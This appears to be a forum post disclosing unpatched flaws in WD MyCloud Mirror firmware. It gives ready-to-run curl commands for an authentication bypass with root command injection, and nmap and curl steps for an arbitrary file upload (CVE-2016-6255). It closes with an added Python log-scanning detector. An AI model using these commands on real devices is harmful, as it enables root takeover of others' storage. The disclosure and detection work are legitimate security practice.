Latest firmware still vulnerable

FWIW the latest firmware update for the MyCloud Mirror 1st Gen currently says:

Resolved critical security vulnerabilities that potentially allowed unauthorized file deletion, unauthorized command execution and authentication bypass.

New Release - My Cloud Mirror Firmware Release 2.12.127 (01/08/2019)

However there is still at least one vulnerability described in:

https://www.exploitee.rs/index.php/Western_Digital_MyCloud#network_mgr.cgi_.28added_8.2F6.2F2017.29

which exists in / affects the newest 2.11.168 firmware of the MyCloud Mirror 1st Gen. Maybe other models / generations are affected as well; you can easily test this on your own with a Linux-based system and two simple curl calls showing the authentication bypass:

curl -i "http://IP/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1"
curl -i "http://IP/web/dsdk/DsdkProxy.php" --data "';id;'" --cookie "isAdmin=1;username=admin"

Just replace the admin in “username=admin” with a valid user and you get the following response:

HTTP/1.1 200 OK
Date: Thu, 30 Nov 2017 12:39:20 GMT
Server: Apache
X-Powered-By: PHP/5.4.16
Transfer-Encoding: chunked
Content-Type: application/json
Content-Language: en

<br />
<b>Warning</b>:  http_response_code() expects parameter 1 to be long, string given in <b>/usr/local/modules/web/pages/dsdk/DsdkProxy.php</b> on line <b>48</b><br />
uid=0(root) gid=0(root) groups=0(root)
sh: : Permission denied

which means that you’re again able to run arbitrary commands on the system as root.

Edit

At least the WD MyCloud Mirror 1st Generation with the latest firmware 2.11.168 (11/28/17) is vulnerable to CVE-2016-6255 in libupnp, listed here as well:

https://nvd.nist.gov/vuln/detail/CVE-2016-6255

This can be simply checked with the following steps to upload a file to the target device:

  1. Scan for the UPnP TCP port of the device:

nmap -p 49000-49999 IP

  2. Verify that the file doesn’t exist yet:

curl -i http://IP:49154/test123

(Use the previously found port)

  3. Upload a new file:

curl -i --data "uploadtest" http://IP:49154/test123

  4. Verify that the file exists:

curl -i http://IP:49154/test123
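
For owners who want to check whether the two-request sequence from the first part of this post has already been sent to their device, the following is an added detection sketch, not part of the original post and not WD code. It assumes the web server writes Apache common/combined format access logs; the five-minute window, the function names and the sample lines are constructed for illustration.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Apache common/combined log prefix: client, [timestamp], "METHOD target ..."
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" \d{3}')
WINDOW = timedelta(minutes=5)  # assumed correlation window, tune as needed

def classify(method, target):
    """Label a request as one of the two calls from the post, or None."""
    url = urlsplit(target)
    query = parse_qs(url.query)
    if (url.path == "/cgi-bin/network_mgr.cgi"
            and query.get("cmd") == ["cgi_get_ipv6"]
            and query.get("flag") == ["1"]):
        return "network_mgr"
    if method == "POST" and url.path == "/web/dsdk/DsdkProxy.php":
        return "dsdk_post"
    return None

def find_sequences(lines):
    """Return (client, first_time, second_time) for each DsdkProxy.php POST
    preceded by the network_mgr.cgi call from the same client within WINDOW."""
    last_call = {}  # client -> time of its latest network_mgr.cgi call
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not in the assumed log format
        client, stamp, method, target = m.groups()
        when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
        kind = classify(method, target)
        if kind == "network_mgr":
            last_call[client] = when
        elif kind == "dsdk_post":
            first = last_call.get(client)
            if first is not None and timedelta(0) <= when - first <= WINDOW:
                hits.append((client, first, when))
    return hits

# Constructed sample lines (documentation address ranges, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Nov/2017:12:39:18 +0000] "GET /cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1 HTTP/1.1" 200 120',
    '192.0.2.10 - - [30/Nov/2017:12:39:20 +0000] "POST /web/dsdk/DsdkProxy.php HTTP/1.1" 200 310',
    '198.51.100.7 - - [30/Nov/2017:12:40:00 +0000] "POST /web/dsdk/DsdkProxy.php HTTP/1.1" 200 50',
    '203.0.113.5 - - [30/Nov/2017:12:00:00 +0000] "GET /cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1 HTTP/1.1" 200 120',
    '203.0.113.5 - - [30/Nov/2017:12:30:00 +0000] "POST /web/dsdk/DsdkProxy.php HTTP/1.1" 200 50',
]
```

A hit is a heuristic, not proof: access logs in this format do not record cookies or POST bodies, so each flagged client still needs to be reviewed by hand.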